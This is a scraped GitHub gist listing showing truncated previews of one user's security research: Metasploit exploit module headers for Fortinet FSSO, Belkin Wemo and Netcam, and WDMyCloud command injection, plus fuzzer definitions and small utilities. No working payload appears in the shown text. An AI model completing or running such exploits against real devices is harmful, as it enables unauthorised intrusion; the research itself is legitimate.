Skip to content

Instantly share code, notes, and snippets.

View phikshun's full-sized avatar

phikshun phikshun

85 followers · 0 following
View GitHub Profile
@phikshun
phikshun / backdoor.sh
Created June 20, 2017 17:36
I am a backdoor
#!/bin/bash
echo "I am an evil backdoor"
@phikshun
phikshun / fsso_buffer_overflow.rb
Created March 29, 2015 20:39
Fortinet FSSO Stack Buffer Overflow Exploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@phikshun
phikshun / fsso_dcagent_overflow.rb
Created March 29, 2015 20:23
Fortinet FSSO DCAgent Exploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@phikshun
phikshun / calc_magic.rb
Created March 29, 2015 20:19
DCAgent Exploit Kernel32.dll Offset Generator
#!/usr/bin/env ruby
require 'pedump'
require 'colorize'
@lang = {
0x0401 => 'ar',
0x0415 => 'pl',
0x0402 => 'bg',
0x0416 => 'pt-br',
@phikshun
phikshun / dcagent.xml
Created March 29, 2015 19:44
Fortinet FSSO DCAgent Protocol Peach Pit
<?xml version="1.0" encoding="utf-8"?>
<Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">
<DataModel name="DataTSAgent">
<Number name="Length" size="16" endian="big">
<Relation type="size" of="Main" expressionSet="size+2" />
</Number>
<Block name="Main">
<Number name="Timestamp" size="32" valueType="string" value="1420054000" signed="false" endian="big">
@phikshun
phikshun / fsso.xml
Created March 22, 2015 20:27
Fortinet FSSO Peach Pit
<?xml version="1.0" encoding="utf-8"?>
<Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">
<DataModel name="FSSO">
<Number name="PktLen" size="32" endian="big">
<Relation type="size" of="Main" expressionSet="size+4" />
</Number>
<Block name="Main">
<Number name="PktTag" valueType="hex" value="80" size="8" endian="big" />
@phikshun
phikshun / wemo_upnp_exec.rb
Last active October 13, 2017 19:13
Belkin Wemo SmartSwitch UPnP Remote Command Injection
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@phikshun
phikshun / belkin_netcamhd_cmd_injection.rb
Created April 4, 2014 22:53
Belkin Netcam HD UPnP Command Injection
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Belkin Netcam HD UPnP Command Injection",
@phikshun
phikshun / wdmycloud_cmd_injection_csrf.rb
Created March 20, 2014 00:51
WDMyCloud Command Injection CSRF
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'WDMyCloud NAS Command Injection CSRF',
@phikshun
phikshun / netstat.rb
Created March 19, 2014 00:50
Netstat.rb
#!/usr/bin/env ruby
require 'net/telnet'
require 'colorize'
display_sockets = false
usage = "Usage: ./netstat.rb <host> <username> [password]\n"
host = ARGV[0]
user = ARGV[1] || ''
pass = ARGV[2] || ''